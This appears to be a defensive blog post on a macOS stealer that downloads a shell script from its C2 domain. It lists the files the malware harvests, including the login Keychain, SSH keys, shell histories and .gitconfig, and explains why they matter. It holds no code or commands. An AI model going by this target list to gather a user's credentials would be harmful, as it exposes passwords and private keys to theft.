AppleProcessHub stealer

Researchers at Kandji dug into a new stealer, using the command and control server domain appleprocesshub[.]com, first noticed by MalwareHunterTeam on Twitter (no, I will not call it X, nor will I link to anything there). Findings are both interesting and vague.

How does it infect the machine?

The malware appears to have been found on VirusTotal, from what I can tell, which means there’s a lot of missing context. Further, it appears that there’s a lot of analysis that was only posted on Twitter, and we’ve established my thoughts on that.

The “first stage” (in quotes because it’s unclear if this is actually the first stage) is a dynamic library (.dylib) that also happens to contain code that is executable as a standalone binary. How exactly this would have gotten onto a machine and been executed appears to be unknown, which is always deeply dissatisfying to me. It’s also unknown how/whether this malware maintains persistence. As always, anyone with more insight is welcome to reply in the comments.

However, once it’s running, one of the things it does is download and execute a shell script from the aforementioned C&C domain. That shell script is available on VirusTotal and is in clear text, so it’s easy to analyze. Or, I should say, would be, if VT would allow me to download it, but they don’t allow that for anything but binary files for free accounts. I can cheat a bit, though, and look at the content of the file, which gives good insight into what the script is doing.

What does the script do?

As pointed out by Kandji, it collects things like:

  • ~/Library/Keychains/Login.keychain-db
  • ~/.bash_history
  • ~/.zsh_history
  • ~/.gitconfig
  • ~/.ssh/
  • /etc/hosts
  • A lot of system information, including serial number, username, and a list of installed applications

The implications of this may not be immediately obvious to many, but the Keychain is a particularly juicy target. It contains many passwords and cryptographic certificates, and all the attacker needs to do to access all that is somehow phish the password from the user. There are numerous ways this could be done, but I don’t see any mention of this in any of the analysis, so I don’t know how the attackers are doing it.

The .ssh folder is also particularly juicy, as it contains private keys that can be used to connect to specific remote hosts. Similarly, the bash and zsh history files and gitconfig file can contain some sensitive information, depending on your usage.

Conclusions

The fact that this malware is hiding inside a .dylib is very unique and interesting. This is not something I’ve seen in malware since the first release of Mac OS X decades ago.

That said, the amount that is unknown means it’s hard to know how to respond. Kandji provided hashes of the files they know about, but just removing those from an infected Mac may not be sufficient. I’ll update if more is learned, but unfortunately, it is often the case with malware like this that no further information is ever discovered.

Leave a Reply

Your email address will not be published. Required fields are marked *